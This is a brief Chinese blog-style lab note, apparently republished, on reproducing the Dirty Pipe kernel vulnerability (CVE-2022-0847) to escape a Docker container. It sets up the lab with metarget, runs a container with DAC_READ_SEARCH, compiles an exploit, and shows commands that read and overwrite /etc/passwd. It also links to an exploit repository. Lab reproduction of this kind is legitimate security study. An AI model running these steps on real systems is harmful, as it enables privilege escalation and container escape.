安裝環(huán)境
./metarget cnv install cve-2022-0847 --verbose
原理
同臟牛,通過寫只讀內存,對映射的內存做篡改
EXP
docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu
如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"錯誤則運行下列命令
docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntu
gcc dp.c -o dp
讀系統(tǒng)文件:/exp/dp /etc/passwd
寫系統(tǒng)文件 /exp/dp /etc/passwd 1 ootz:
GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 實現(xiàn)容器逃逸
參考
云原生之容器安全實踐-安全客 - 安全資訊平臺 (anquanke.com)文章來源:http://www.zghlxwxcb.cn/news/detail-641247.html
從臟管道(CVE-2022-0847)到docker逃逸 - 先知社區(qū) (aliyun.com)文章來源地址http://www.zghlxwxcb.cn/news/detail-641247.html
到了這里,關于Docker Dirtypipe(CVE-2022-0847)漏洞復現(xiàn)與分析容器逃逸的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!